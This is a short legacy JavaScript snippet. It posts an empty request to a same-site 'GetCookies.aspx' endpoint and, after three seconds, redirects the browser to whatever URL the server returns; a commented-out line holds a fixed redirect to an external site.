﻿var oHttpReq  = null;
if(window.XMLHttpRequest)
{
    oHttpReq = new XMLHttpRequest();
}
else
{
    oHttpReq = new ActiveXObject("MSXML2.XMLHTTP");
}
oHttpReq.open("POST", "GetCookies.aspx",false);
oHttpReq.send(""); 
result = oHttpReq.responseText; 
if(result!="")
{
    setTimeout(function(){
        window.location.href = result;
    },3000);
}


//setTimeout(function(){
//    window.location.href = "http://xz.yajuke.com";
//},3000);